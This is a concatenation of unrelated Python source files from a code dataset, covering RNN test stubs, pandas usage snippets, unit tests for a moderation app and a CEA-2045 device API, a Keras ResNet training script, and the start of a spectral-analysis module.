grad = RNN.get_gradients(delta_w, delta_ws)\n output.append(np.around(np.sum(np.abs(grad - numgrad) / np.abs(grad + numgrad)), 10))\n\n RNN.update(delta_w, delta_ws)\n delta_w.fill(0)\n delta_ws.fill(0)\n\n return output\n\n def Stub_cross_validate(self, RNN, num_folds=1):\n size = len(RNN.trees)\n folds = size // num_folds * np.ones(num_folds, dtype=np.int)\n folds[:size % num_folds] += 1\n indices = np.arange(0, size)\n np.random.shuffle(indices)\n np.random.shuffle(RNN.trees)\n\n current = 0\n accuracies = np.zeros(num_folds)\n for i, fold in enumerate(folds):\n # Assign training and test sets\n start, stop = current, current + fold\n RNN.tree_test = indices[start:stop]\n RNN.tree_train = np.concatenate((indices[:start], indices[stop:]), axis=0)\n current = stop\n\n # perform training\n '''\n Irrelevant for branch coverage as take up alot of time\n RNN.train()\n _, accuracies[i], _ = RNN.test()\n RNN.reset_weights()\n '''\n return np.mean(accuracies)\n\n def Stub_test(self, RNN):\n RNN.tree_test = np.array([4, 10])\n test_cost = 0\n correct = 0\n incorrect = []\n for t in RNN.tree_test:\n tree = RNN.trees[t]\n RNN.calc_outputs(tree)\n test_cost += RNN.get_cost(tree)\n tree.pred_label = np.argmax(tree.predictions)\n true_label = np.where(tree.target == 1)[0]\n if true_label == tree.pred_label:\n correct += 1\n else:\n incorrect.append(tree.id)\n\n return 1. * correct / len(RNN.tree_test)\n\n # stub forward#1\n def Stub1_forward(self, node, RNN):\n \"\"\"\n Checks true/false for first two and true for the third\n \"\"\"\n\n if node.num_child == 0:\n return node.vec\n\n elif node.num_child == 1:\n return np.tanh(node.children[0].vec)\n\n elif node.num_child == 2:\n # setting number of children of left child to 1 to check true of the second condition\n node.children[0].num_child = 1\n left = RNN.forward(node.children[0])\n node.children[0].num_child = 0\n right = RNN.forward(node.children[1])\n children = concat_with_bias(left, right)\n\n node.vec = np.tanh(np.dot(RNN.w, children))\n\n return node.vec\n\n # stub forward#2\n\n def Stub2_forward(self, node, RNN):\n # For getting False from the third condition\n node.num_child = 3\n\n if node.num_child == 0:\n return node.vec\n\n elif node.num_child == 1:\n return np.tanh(node.children[0].vec)\n\n elif node.num_child == 2:\n left = RNN.forward(node.children[0])\n right = RNN.forward(node.children[1])\n children = concat_with_bias(left, right)\n\n node.vec = np.tanh(np.dot(RNN.w, children))\n\n return node.vec\n\n def Stub1_back_prop(self, RNN, node, delta_com, delta_w, delta_ws):\n \"\"\"\n Checks true/false for first two and true for the third\n \"\"\"\n\n if node.num_child == 0:\n # TODO: take word vector derivatives\n return\n elif node.num_child == 1:\n return\n elif node.num_child == 2:\n node.children[0].num_child = 1\n left_vector = node.children[0].vec\n node.children[1].num_child = 0\n right_vector = node.children[0].vec\n # [x3, p1]\n\n # concatenate with bias here\n children = concat_with_bias(left_vector, right_vector)\n\n # delta_w = delta_com * [x3, p1]\n delta_w += np.dot(delta_com, children.T)\n\n # W.T * delta_com * f'([x3, p1])\n delta_down = np.multiply(np.dot(RNN.w.T, delta_com), tanh_derivative(children))\n\n left_delta_down = delta_down[:RNN.dim]\n right_delta_down = delta_down[RNN.dim: 2 * RNN.dim]\n\n RNN.back_prop(node.children[0], left_delta_down, delta_w, delta_ws)\n RNN.back_prop(node.children[1], right_delta_down, delta_w, delta_ws)\n\n def Stub2_back_prop(self, RNN, node, delta_com, delta_w, delta_ws):\n \"\"\"\n Checks false for third condition\n \"\"\"\n node.num_child = 3\n\n if node.num_child == 0:\n # TODO: take word vector derivatives\n return\n elif node.num_child == 1:\n return\n elif node.num_child == 2:\n node.children[0].num_child = 1\n left_vector = node.children[0].vec\n node.children[1].num_child = 0\n right_vector = node.children[1].vec\n # [x3, p1]\n\n # concatenate with bias here\n children = concat_with_bias(left_vector, right_vector)\n\n # delta_w = delta_com * [x3, p1]\n delta_w += np.dot(delta_com, children.T)\n\n # W.T * delta_com * f'([x3, p1])\n delta_down = np.multiply(np.dot(RNN.w.T, delta_com), tanh_derivative(children))\n\n left_delta_down = delta_down[:RNN.dim]\n right_delta_down = delta_down[RNN.dim: 2 * RNN.dim]\n\n RNN.back_prop(node.children[0], left_delta_down, delta_w, delta_ws)\n RNN.back_prop(node.children[1], right_delta_down, delta_w, delta_ws)\n\n def Stub_numerical_gradient(self, RNN, tree):\n \"\"\"\n Checks the only condition in the for loop\n \"\"\"\n\n epsilon = 1e-5\n initial_params = RNN.get_params()\n RNN.set_params(initial_params)\n l = len(initial_params)\n\n # To run the loop only once\n l = 1\n\n vector = np.zeros(initial_params.shape)\n exp_grad = np.zeros(initial_params.shape)\n\n for i in range(l):\n vector[i] = epsilon\n\n RNN.set_params(initial_params + vector)\n RNN.calc_outputs(tree)\n c_plus = RNN.get_cost(tree)\n\n RNN.set_params(initial_params - vector)\n RNN.calc_outputs(tree)\n c_minus = RNN.get_cost(tree)\n\n exp_grad[i] = (c_plus - c_minus) / (2 * epsilon)\n\n vector[i] = 0\n\n RNN.set_params(initial_params)\n\n return exp_grad\n\n def Stub1_train(self, RNN, is_val=True):\n \"\"\"\n\n \"\"\"\n # error derivatives with respect to parameters\n delta_w = np.zeros(RNN.w.shape)\n delta_ws = np.zeros(RNN.ws.shape)\n train_cost = 0\n\n # early stopping parameters\n min_cost = np.inf\n max_count = 30\n count_down = max_count\n error_factor = 0.0001\n train_size = len(RNN.tree_train)\n\n # best set of parameters\n w_best = None\n ws_best = None\n\n RNN.epochs = 1\n\n for i in xrange(RNN.epochs):\n # Shuffle training set and create mini batches\n np.random.shuffle(RNN.tree_train)\n mini_batches = [RNN.tree_train[i:min(i + RNN.mini_batch, train_size)]\n for i in xrange(0, train_size, RNN.mini_batch)]\n # run SGD for each mini batch\n mini_batches = [[123]]\n for mini_batch in mini_batches:\n train_cost = 0\n for t in mini_batch:\n tree = RNN.trees[t]\n # perform calculations\n RNN.calc_outputs(tree)\n RNN.calc_errors(tree, delta_w, delta_ws)\n train_cost += RNN.get_cost(tree)\n\n # scale and regularize the parameters\n scale = 1. / len(mini_batch)\n RNN.scale_regularize(delta_w, delta_ws, scale)\n RNN.update(delta_w, delta_ws)\n\n # Reset the derivatives\n delta_w.fill(0)\n delta_ws.fill(0)\n\n if is_val:\n # check performance on validation set for early stopping\n pred_cost = RNN.validate()\n if pred_cost < (1 - error_factor) * min_cost:\n min_cost = pred_cost\n count_down = max_count\n w_best = RNN.w.copy()\n ws_best = RNN.ws.copy()\n else:\n count_down -= 1\n\n # performance on validation set has not decreased significantly in the past\n if count_down == 0:\n RNN.w = w_best\n RNN.ws = ws_best\n break\n\n return train_cost\n\n def Stub2_train(self, RNN, is_val=False):\n \"\"\"\n For isVal=False\n \"\"\"\n # error derivatives with respect to parameters\n delta_w = np.zeros(RNN.w.shape)\n delta_ws = np.zeros(RNN.ws.shape)\n train_cost = 0\n\n # early stopping parameters\n min_cost = np.inf\n max_count = 30\n count_down = max_count\n error_factor = 0.0001\n train_size = len(RNN.tree_train)\n\n # best set of parameters\n w_best = None\n ws_best = None\n\n RNN.epochs = 1\n\n for i in xrange(RNN.epochs):\n # Shuffle training set and create mini batches\n np.random.shuffle(RNN.tree_train)\n mini_batches = [RNN.tree_train[i:min(i + RNN.mini_batch, train_size)]\n for i in xrange(0, train_size, RNN.mini_batch)]\n # run SGD for each mini batch\n mini_batches = [[123]]\n for mini_batch in mini_batches:\n train_cost = 0\n for t in mini_batch:\n tree = RNN.trees[t]\n # perform calculations\n RNN.calc_outputs(tree)\n RNN.calc_errors(tree, delta_w, delta_ws)\n train_cost += RNN.get_cost(tree)\n\n # scale and regularize the parameters\n scale = 1. / len(mini_batch)\n RNN.scale_regularize(delta_w, delta_ws, scale)\n RNN.update(delta_w, delta_ws)\n\n # Reset the derivatives\n delta_w.fill(0)\n delta_ws.fill(0)\n\n if is_val:\n # check performance on validation set for early stopping\n pred_cost = RNN.validate()\n if pred_cost < (1 - error_factor) * min_cost:\n min_cost = pred_cost\n count_down = max_count\n w_best = RNN.w.copy()\n ws_best = RNN.ws.copy()\n else:\n count_down -= 1\n\n # performance on validation set has not decreased significantly in the past\n if count_down == 0:\n RNN.w = w_best\n RNN.ws = ws_best\n break\n\n return train_cost\n\n def Stub3_train(self, RNN, is_val=True):\n \"\"\"\n For isVal=True,pred_cost condition False and count_down==0\n \"\"\"\n # error derivatives with respect to parameters\n delta_w = np.zeros(RNN.w.shape)\n delta_ws = np.zeros(RNN.ws.shape)\n train_cost = 0\n\n # early stopping parameters\n min_cost = np.inf\n max_count = 30\n count_down = max_count\n error_factor = 0.0001\n train_size = len(RNN.tree_train)\n\n # best set of parameters\n w_best = None\n ws_best = None\n\n RNN.epochs = 1\n\n for i in xrange(RNN.epochs):\n # Shuffle training set and create mini batches\n np.random.shuffle(RNN.tree_train)\n mini_batches = [RNN.tree_train[i:min(i + RNN.mini_batch, train_size)]\n for i in xrange(0, train_size, RNN.mini_batch)]\n # run SGD for each mini batch\n mini_batches = [[123]]\n for mini_batch in mini_batches:\n train_cost = 0\n for t in mini_batch:\n tree = RNN.trees[t]\n # perform calculations\n RNN.calc_outputs(tree)\n RNN.calc_errors(tree, delta_w, delta_ws)\n train_cost += RNN.get_cost(tree)\n\n # scale and regularize the parameters\n scale = 1. / len(mini_batch)\n RNN.scale_regularize(delta_w, delta_ws, scale)\n RNN.update(delta_w, delta_ws)\n\n # Reset the derivatives\n delta_w.fill(0)\n delta_ws.fill(0)\n\n if is_val:\n # check performance on validation set for early stopping\n pred_cost = RNN.validate()\n pred_cost = (1 - error_factor) * min_cost - 1\n\n if pred_cost < (1 - error_factor) * min_cost:\n min_cost = pred_cost\n count_down = max_count\n w_best = RNN.w.copy()\n ws_best = RNN.ws.copy()\n else:\n count_down -= 1\n\n # performance on validation set has not decreased significantly in the past\n count_down = 0\n if count_down == 0:\n RNN.w = w_best\n RNN.ws = ws_best\n break\n\n return train_cost\n\n\nclass TestModel(TestCase):\n RNN = None\n R = None\n\n def setUp(self):\n TestModel.R = RNNBranchCoverage()\n training_size = 10\n\n train = np.ceil(0.6 * training_size)\n val = np.ceil(0.15 * training_size)\n\n with open('rnn.pickle_test', 'rb') as pickle_file:\n TestModel.RNN = pickle.load(pickle_file)\n\n indices = np.arange(0, training_size)\n np.random.shuffle(TestModel.RNN.trees)\n np.random.shuffle(indices)\n TestModel.RNN.tree_train = indices[:train]\n TestModel.RNN.tree_val = indices[train:train + val]\n TestModel.RNN.tree_test = indices[train + val:]\n TestModel.RNN.train(True)\n\n def test_Stub_validate(self):\n exp = 0.080\n actual = TestModel.R.Stub_validate(TestModel.RNN)\n self.assertAlmostEqual(exp, actual)\n\n def test_Stub_check_model_veracity(self):\n exp = 0.08999999999999999\n actual = TestModel.R.Stub_validate(TestModel.RNN)\n self.assertAlmostEqual(exp, actual)\n\n def test_Stub_test(self):\n exp = 1.\n actual = TestModel.R.Stub_test(TestModel.RNN)\n self.assertAlmostEqual(exp, actual)\n\n def test_Stub_cross_validate(self):\n exp = 0.\n actual = TestModel.R.Stub_cross_validate(TestModel.RNN)\n self.assertAlmostEqual(exp, actual)\n\n def test_Stub1_forward(self):\n exp = np.array([[-0.1006483 ],[-0.29548601],[ 0.0063629 ],[-0.17319958],[ 0.12327064],[ 0.02946587],[ 0.00644705],[-0.47383259],[-0.17706092],[ 0.14228462],[ 0.67255053],[-0.03523792],[ 0.2564717 ],[-0.18084416],[-0.3138467 ],[ 0.10138548],[-0.22682543],[ 0.11797612],[ 0.29268094],[ 0.17062235],[-0.19280561],[-0.31326626],[-0.05769646],[-0.31976983],[-0.1723143 ],[ 0.33203993],[-0.13410669],[ 0.04226759],[-0.27281455],[ 0.1945153 ],[-0.15207751],[ 0.32342922],[ 0.36387432],[ 0.10829055],[ 0.26577119],[ 0.08183803],[ 0.05923863],[-0.4977896 ],[-0.36396976],[-0.58843395],[ 0.51139022],[ 0.20288105],[-0.81887659],[ 0.21982588],[ 0.45401075],[-0.33887771],[-0.02298285],[-0.35496048],[-0.53704188], [0.27011948]])\n actual = TestModel.R.Stub1_forward(TestModel.RNN.trees[0].root, TestModel.RNN)\n assert np.allclose(exp, actual)\n # self.assertAlmostEquals(exp, actual)\n\n def test_Stub2_forward(self):\n exp = None\n actual = TestModel.R.Stub2_forward(TestModel.RNN.trees[0].root, TestModel.RNN)\n self.assertAlmostEqual(exp, actual)\n\n def test_Stub1_back_prop(self):\n exp = None\n actual = TestModel.R.Stub1_back_prop(TestModel.RNN, TestModel.RNN.trees[0].root, 0, 0, 0)\n self.assertAlmostEqual(exp, actual)\n\n def test_Stub2_back_prop(self):\n exp = None\n actual = TestModel.R.Stub2_back_prop(TestModel.RNN, TestModel.RNN.trees[0].root, 0, 0, 0)\n self.assertAlmostEqual(exp, actual)\n\n def test_Stub_numerical_gradient(self):\n exp = np.array([[ 0.],[ 0.],[ 0.],[ 0.],[ 0.],[ 0.],[ 0.],[ 0.],[ 0.],[ 0.],[ 0.],[ 0.],[ 0.],[ 0.],[ 0.],[ 0.],[ 0.],[ 0.]])\n actual = TestModel.R.Stub_numerical_gradient(TestModel.RNN, TestModel.RNN.trees[0])\n actual = actual[:18, :]\n assert np.allclose(exp, actual)\n\n def test_Stub1_train(self):\n exp = 0.089999999999999\n actual = TestModel.R.Stub1_train(TestModel.RNN, True)\n self.assertAlmostEqual(exp, actual)\n\n def test_Stub2_train(self):\n exp = 0.11\n actual = TestModel.R.Stub2_train(TestModel.RNN, False)\n self.assertAlmostEqual(exp, actual)\n\n def test_Stub3_train(self):\n exp = 0.13\n actual = TestModel.R.Stub3_train(TestModel.RNN, True)\n self.assertAlmostEqual(exp, actual)","sub_path":"RNNBranchCoverage_omer.py","file_name":"RNNBranchCoverage_omer.py","file_ext":"py","file_size_in_byte":18193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"378459531","text":"\nimport pandas as pa\nimport pandas as pd\nimport numpy as np\n\n\n\npa.set_option('max_rows', 9)\npa.set_option('expand_frame_repr', False)\n\n\n\n# Input data\ndf = pd.DataFrame({'A': ['a', 'b', 'a'], 'B': ['b', 'a', 'c'], 'C': [1, 2, 3]})\ndf = pa.Series(list('abcaa'))\ndf = pd.DataFrame([[1,2], [3,4]], columns=['a', 'b'])\n\nraw = pa.read_csv(r\"C:\\VS Projects\\Numerics\\Numerics\\Temp.FSharp\\Data\\Movies\\Movies_2m.csv\", encoding = \"ISO-8859-1\")\n\n# Use parse-dates\nraw = pa.read_csv(r\"D:\\FastStats\\PUBLISH\\BMK\\project\\All Transactions.csv\", parse_dates=['TransDate'], dayfirst=True)\n# since to_datetime is unreliable with UK/US dates\n# df['TransDate2'] = pa.to_datetime(df['TransDate'])\n\n\n# create a sample of OPs unique values\nseries = pd.Series(np.random.randint(low=0, high=3, size=100))\nmapper = {0: 'New York', 1: 'London', 2: 'Zurich'}\nnomvar = series.replace(mapper)\n\npa.get_dummies(df, prefix='col')\n\n\n# Creating\na = pd.concat({'x': x, 'y': y, 'val': val}, axis=1) # From series\n \n\n\n\n\n# Summary of data frame\ndf.info\ndf.head()\ndf.sample(10)\ndf.describe()\n\n\n\n\n\n\n\n\n\n# Summary Stats of SERIES\nraw['waiting_time'].value_counts()\nraw[\"Destination\"].unique()\n\n\n\n# Aggregations\ngroup='Product'\ndf.groupby(group).groups.keys()\n\ndf.groupby(group).count() # Creates dataframe\ndf.groupby(['Year', 'Product']).count() # Creates dataframe with hierarchical index\ndf.groupby(group)['Cost'].mean() # Creates series\n\ndf.groupby(['Year']).agg({'Cost':[min, max, 'mean'], 'Product':'count'}) # Creates df\n\n# The columns have a multi-level index that you can collapse with\ndiffs.columns = [\"_\".join(x) for x in diffs.columns.ravel()]\n\n\npiv = pa.pivot_table(df, values=\"Cost\",index=[\"Year\"], columns=[\"Product\"], fill_value=0)\npiv = pa.pivot_table(raw, values=\"Cost\",index=[\"Year\"], columns=[\"Destination\"], fill_value=0)\n\n# Use dropna to ensure all R & C present\ncellMeans = pa.pivot_table(df, index=[byVar,\"Y\"], columns=[\"X\"], values=ofVar, aggfunc=np.mean, fill_value=0, dropna=False)\n\n\n\n\n\n\n\n# Plots\nplt.hist(df.Cost, bins=5, facecolor='red', alpha=0.5, label=\"Cost\")\nplt.legend()\nplt.show()\n\n\nagg = df.groupby('Year')['Cost'].mean()\nagg.plot.bar()\nplt.show()\n\n\n\npiv = pa.pivot_table(df, values=\"Cost\",index=[\"Year\"], columns=[\"Product\"], fill_value=0)\nsns.heatmap(piv)\nplt.show()\n\n\npiv2 = pa.pivot_table(df, values=\"Cost\",index=[\"Year\"], columns=[\"Destination\"], fill_value=0)\nsns.heatmap(piv2)\nplt.show()\n\n\n\n\n\n\n\n\n# Columns\nraw.drop(['PatientId', 'AppointmentID'], axis=1, inplace=True)\n\n\nraw = raw.rename(columns={'Gender': 'sex', 'ScheduledDay': 'scheduled_day', 'AppointmentDay': 'appointment_day', \n 'Age': 'age', 'Neighbourhood': 'neighbourhood', 'Scholarship': 'scholarship', \n 'Hipertension': 'hypertension', 'Diabetes': 'diabetic', 'Alcoholism': 'alcoholic', \n 'Handcap': 'handicap', 'No-show': 'show_up'})\n\ndests = raw.filter(['Person URN', 'Destination'])\n\n\n\n\n\n# Data Types\nraw = raw.select_dtypes(['int64']).apply(pd.Series.astype, dtype='category')\n\n\nraw['Income'] = raw['Income'].astype('category')\nraw['Occupation'] = raw['Occupation'].astype('category')\nraw['age'] = raw['age'].astype('int64')\nraw.info()\n\n\n\n\n\n\n# Values\nraw['sex'] = raw['sex'].map({'F': 0, 'M': 1})\nraw['show_up'] = raw['show_up'].map({'No': 1, 'Yes': 0})\nraw['scheduled_day'] = pd.to_datetime(raw['scheduled_day'], infer_datetime_format=True)\nraw['appointment_day'] = pd.to_datetime(raw['appointment_day'], infer_datetime_format=True)\nraw['waiting_time'] = list(map(lambda x: x.days, raw['appointment_day'] - raw['scheduled_day']))\nraw['waiting_time'] = raw['waiting_time'].apply(lambda x: 1 if(x > 1) else 0)\nraw['appointment_dayofweek'] = raw['appointment_day'].map(lambda x: x.dayofweek)\n\n\n\n\n\n# Rows\nraw.drop(raw[raw['waiting_time'] < -1].index, inplace=True)\ndf = raw.head(20)\n\n\n\n\n\n# Indexing rows (the condition returns the index values for the main df)\ndests = raw.loc[raw[\"Destination\"]==\"Italy\"]\ndests = raw.loc[raw[\"Destination\"].isin([\"Italy\", \"France\"])]\n\ndf.loc[(df['column_name'] == some_value) & df['other_column'].isin(some_values)]\ndf.loc[df['column_name'] != some_value]\ndf.loc[~df['column_name'].isin(some_values)]\n\n\n# Dataframe uses mask, which sets non selected rows to Nan\ndf.where(df[\"A\"]=='a')\ndf.where(df[\"A\"]=='a').dropna() # Hide these rows\n\n# df indexing applies mask and drops Nan\ndf[df[\"A\"]=='a']\ndf[(df[\"A\"]=='a') & (df[\"B\"]=='b')]\ndf[df[\"A\"]=='a' & df[\"B\"]=='b'] # Type cast error without brackets\n\n# df.loc is equivalent to mask\ndf.loc[df[\"A\"]=='a']\ndf.loc[[True,False,True], 'C'] # Can also specify column\n\n# Update values with given row and column\ndf.loc[[True,False,True], 'C'] = 9\n\n\n\n\n\n\n# Filter rows (pass bool array of which rows you want)\nraw = pa.read_csv(r\"C:\\VS Projects\\Numerics\\Numerics\\Temp.FSharp\\Data\\Movies\\Movies_200k.csv\")\ndef inGenre(df, genre):\n dGenres = df[\"Genre\"]\n getGenre = lambda multi : multi.split(\"|\")\n isGenre = lambda gList : genre in gList\n bGenres = dGenres.apply(getGenre).apply(isGenre)\n return df[bGenres.values]\n\ninGenre(raw, \"Western\")\n\n\n\n# Dedup rows\nwanted = inGenre(topVol, \"Western\")[[\"Title\", \"Genre\"]].drop_duplicates()\n\n\n\n\n\n# GroupBy (is slow)\nurns = dests.groupby('Person URN')\n\ni=10\nfor urn,gp in urns:\n if i>0:\n print (urn)\n print (gp[\"Destination\"])\n i=i-1\n\n\n\n\n# Convert to ndarray\ndf = pd.DataFrame([[1,2], [3,4],[5,6]], columns=['a', 'b'])\na=df.iloc[:,1:]\nb=df.iloc[:,1:].values\n\nprint(type(df))\nprint(type(a))\nprint(type(b))\n\nc = df.as_matrix()\nprint(type(c))\nprint(c)\nprint(c.shape)\n\n\n\n\n\n\n# Joining on Columns\nmovieEmb = embeddingsToDf(movieMod, \"Title\")\nshowMovies = inGenre(topVol, \"Western\")\npa.merge(movieEmb, showMovies, how='inner', on='Title')\n\n\n# Joining on Index\nmovieEmb = embeddingsToDf(movieMod, \"Title\").set_index(\"Title\")\nshowMovies = inGenre(topVol, \"Western\").set_index(\"Title\")\npa.merge(movieEmb, showMovies, how='inner', left_index=True, right_index=True)\n\n\n\n\n\n\n\n\n\n\n\n######################################################################################\n# SERIES\n######################################################################################\n\n\n# Series: filtering\nraw = pa.read_csv(r\"C:\\VS Projects\\Numerics\\Numerics\\Temp.FSharp\\Data\\Movies\\Movies_200k.csv\")\n\n# value_counts() returns a series\n# where returns full length series but with NaN for the value\n# dropna removes the rows with NaN, ie that fail the where\nraw[\"Title\"].value_counts().where(lambda x: x==601).dropna()\n\n# Dont seem to be able to have multiple conditions in the lambda\n# - so define m, and use in the where to index the series\nm = topVol[\"Member ID\"].value_counts()\nm.where(m>10).where(m<50).dropna()\n\n\n\n\nraw[\"Rating\"].value_counts().sort_values()\nraw[\"Rating\"].value_counts().sort_index()\n\n# Filter the dataframe\nraw[raw[\"Rating\"] >= 4.0]\n\n\n\n\n\n# Banding a series\nr=pa.cut(df[row], bins=rBins, labels=rLabels)\nc=pa.cut(df[col], bins=cBins, labels=cLabels)\npiv = pa.crosstab(r,c)\n\n\n\n\n\n\n# Apply function to each value of series\ndef inGenre(genre):\n dGenres = raw[\"Genre\"]\n getGenre = lambda ar : ar.split(\"|\")\n sGenres = dGenres.apply(getGenre)\n return sGenres\n\nlist(inGenre(\"Action\")[0:10])\n\n\n\n\n\n# Set same flag to all memeber records, based on one title's rating\ndef FlagRatingsOver(df, title, over=3.0):\n ixUnder = (df[\"Rating\"] < over)\n ixOver = (df[\"Rating\"] >= over)\n ixTitle = (df[\"Title\"] == title)\n col = \"Like_\" + title\n df.loc[ixTitle & ixUnder, col] = 0\n df.loc[ixTitle & ixOver, col] = 1\n tData = df[[\"Member ID\", col]].dropna().drop_duplicates()\n flag=pa.merge(df[[\"Member ID\"]], tData, on=\"Member ID\", how='inner')\n df[col] = flag\n print(df[col].value_counts())\n\n\n\n\n# Combine Series\ns1 = pd.Series([1, 2], index=['A', 'B'], name='s1')\ns2 = pd.Series([3, 4], index=['A', 'B'], name='s2')\npd.concat([s1, s2], axis=1)\npd.concat([s1, s2], axis=1).reset_index()\n\n\n\n# Vectorising and Filtering\ndef compareDistribution(xSeries, catSeries, ignoreValue = None):\n xmin = np.nanmin(xSeries)\n xmax = np.nanmax(xSeries)\n bins = np.linspace(xmin,xmax, 10)\n keep = lambda x: x != ignoreValue\n keepV = np.vectorize(keep)\n\n def get_x(cat):\n catIx = catSeries[catSeries==cat].dropna().index\n xs = xSeries[catIx].dropna()\n xs[keepV(xs)]\n\n def plot_cat(cat):\n x = get_x(cat)\n plt.hist(x, bins, alpha=0.5, label=str(cat), normed=True)\n\n cats = list(catSeries.drop_duplicates().values)\n\n for cat in cats:\n plot_cat(cat)\n\n plt.legend(loc='upper right')\n plt.show()\n","sub_path":"Samples/Pandas examples.py","file_name":"Pandas examples.py","file_ext":"py","file_size_in_byte":8603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"632255077","text":"from StringIO import StringIO\n\nimport sys\n\nimport unittest\n\nimport moderation\n\nfrom moderation.tests.utils.testsettingsmanager import get_only_settings_locals\n\n\nclass UtilsTestCase(unittest.TestCase):\n \n def test_get_only_settings_locals(self):\n MYSETTING_LOCAL1 = 'test'\n MYSETTING_LOCAL2 = 'test'\n self.assertEqual(get_only_settings_locals(locals()),\n dict(MYSETTING_LOCAL1='test',\n MYSETTING_LOCAL2='test'))\n \n \nclass PEP8TestCase(unittest.TestCase):\n \n def test_pep8_rules(self): \n import pep8 \n sys.argv[1:] = ['--filename=*.py', '--show-source', '--show-pep8',\n '--ignore=W291', moderation.__path__[0]] \n buf = StringIO() \n sys.stdout = buf\n pep8._main() \n sys.stdout = sys.__stdout__ \n result = buf.getvalue()\n\n self.assertEqual(\"\", result,\n \"Code messages should be empty but was:\\n\" + result)\n","sub_path":"src/moderation/tests/unit/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"88920502","text":"\n\nimport unittest\nimport CEA_2045\n\ncea = CEA_2045.CEA2045_API(\"Fake\",0)\n#cea = CEA_2045.CEA2045_API(\"/dev/cu.usbserial-A603Y394\",19200)\ncea.initialize(1)\n\nclass CEA2045TestCase(unittest.TestCase):\n\n def test_normal(self):\n '''Test normal run'''\n return_query = {}\n cea.send_msg('normal')\n cea.recv_msg()\n cea.recv_msg()\n cea.send_msg('link_ack')\n cea.send_msg('query')\n cea.recv_msg()\n return_query = cea.recv_msg()\n cea.send_msg('link_ack')\n self.assertEqual(CEA_2045.switch_query_response(return_query['opcode2']), \"Running Normal\")\n\n def test_emergency(self):\n '''Test emergency command'''\n return_query = {}\n cea.send_msg('emergency')\n cea.recv_msg()\n cea.recv_msg()\n cea.send_msg('link_ack')\n cea.send_msg('query')\n cea.recv_msg()\n return_query = cea.recv_msg()\n cea.send_msg('link_ack')\n self.assertEqual(CEA_2045.switch_query_response(return_query['opcode2']), \"Idle Grid\")\n\n def test_shed(self):\n '''Test shed command'''\n return_query = {}\n cea.send_msg('shed')\n cea.recv_msg()\n cea.recv_msg()\n cea.send_msg('link_ack')\n cea.send_msg('query')\n cea.recv_msg()\n return_query = cea.recv_msg()\n cea.send_msg('link_ack')\n self.assertEqual(CEA_2045.switch_query_response(return_query['opcode2']), \"Running Curtailed Grid\")\n","sub_path":"applications/nrel/agents/CEA2045RelayAgent/cea2045relay/API_test.py","file_name":"API_test.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"108901322","text":"import resnet\nfrom keras.callbacks import ReduceLROnPlateau,EarlyStopping,CSVLogger,TensorBoard\nimport numpy as np\nimport data\nfrom keras.utils import np_utils\nfrom cfg import config\n\n\n\nlr_reducer = ReduceLROnPlateau(factor=np.sqrt(0.1),cooldown=0,patience=5,min_lr=0.5e-6)\nearly_stopper = EarlyStopping(min_delta=0.001,patience=10)\ncsv_logger = CSVLogger(config.csvlogger_path)\nlogging = TensorBoard(config.logs_path)\n\n\n\nx_train,y_train,x_val,y_val = data.load_data(config.train_path,radio=config.radio)\nx_train,y_train,x_val,y_val = data.normalize(x_train,y_train,x_val,y_val)\n\n\n\nmodel = resnet.ResnetBuilder.build_resnet_50((config.img_channels,config.img_rows,config.img_cols),config.nb_classes)\nmodel.compile(loss='categorical_crossentropy',\n optimizer = 'adam',\n metrics = ['accuracy']\n )\n\nif not config.data_augmentation:\n print('Not using data augmentation.')\n model.fit(x_train,y_train,\n batch_size=config.batch_size,\n nb_epoch=config.nb_epoch,\n validation_data=(x_val,y_val),\n shuffle=True,\n callbacks=[lr_reducer,early_stopper,csv_logger,logging]\n )\n\nelse:\n print('Using real-time data augmentation.')\n # This will do preprocessing and realtime data augmentation:\n datagen = ImageDataGenerator(\n featurewise_center=False, # set input mean to 0 over the dataset\n samplewise_center=False, # set each sample mean to 0\n featurewise_std_normalization=False, # divide inputs by std of the dataset\n samplewise_std_normalization=False, # divide each input by its std\n zca_whitening=False, # apply ZCA whitening\n rotation_range=0, # randomly rotate images in the range (degrees, 0 to 180)\n width_shift_range=0.1, # randomly shift images horizontally (fraction of total width)\n height_shift_range=0.1, # randomly shift images vertically (fraction of total height)\n horizontal_flip=True, # randomly flip images\n vertical_flip=False) # randomly flip images\n\n # Compute quantities required for featurewise normalization\n # (std, mean, and principal components if ZCA whitening is applied).\n datagen.fit(X_train)\n\n # Fit the model on the batches generated by datagen.flow().\n model.fit_generator(datagen.flow(X_train, Y_train, batch_size=config.batch_size),\n steps_per_epoch=X_train.shape[0] // config.batch_size,\n validation_data=(X_test, Y_test),\n epochs=config.nb_epoch, verbose=1, max_q_size=100,\n callbacks=[lr_reducer, early_stopper, csv_logger,logging])\n\n\n\nmodel.save_weights(config.model_path)\n\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"535253388","text":"\"\"\"\nComputing and plot powerspectra and spectrograms.\n\nnext_power_of_two(): rounds an integer up to the next power of two.\nnfff_overlap(): computes nfft and overlap based on a requested minimum frequency resolution\n and overlap fraction.\n \npsd(): Compute power spectrum with a given frequency resolution.\ndecibel(): Transforms power to decibel.\nplot_decibel_psd(): Plot power spectrum in decibel.\nmulti_resolution_psd(): Performs the steps to calculate a powerspectrum.\nspectrogram(): Spectrogram of a given frequency resolution and overlap fraction.\n\"\"\"\n\nimport numpy as np\nimport scipy.signal as scps\n\ntry:\n import matplotlib.mlab as mlab\nexcept ImportError:\n pass\n\n\ndef next_power_of_two(n):\n \"\"\"The next integer power of two for an arbitray number.\n \n :param n: (int or float) a positive number\n :return: (int) the next integer power of two\n \"\"\"\n return int(2 ** np.floor(np.log(n) / np.log(2.0) + 1.0-1e-8))\n\n\ndef nfft_noverlap(freq_resolution, samplerate, overlap_frac, min_nfft=16):\n \"\"\"The required number of points for an FFT to achieve a minimum frequency resolution\n and the number of overlapping data points.\n\n :param freq_resolution: (float) the minimum required frequency resolution in Hertz.\n :param samplerate: (float) the sampling rate of the data in 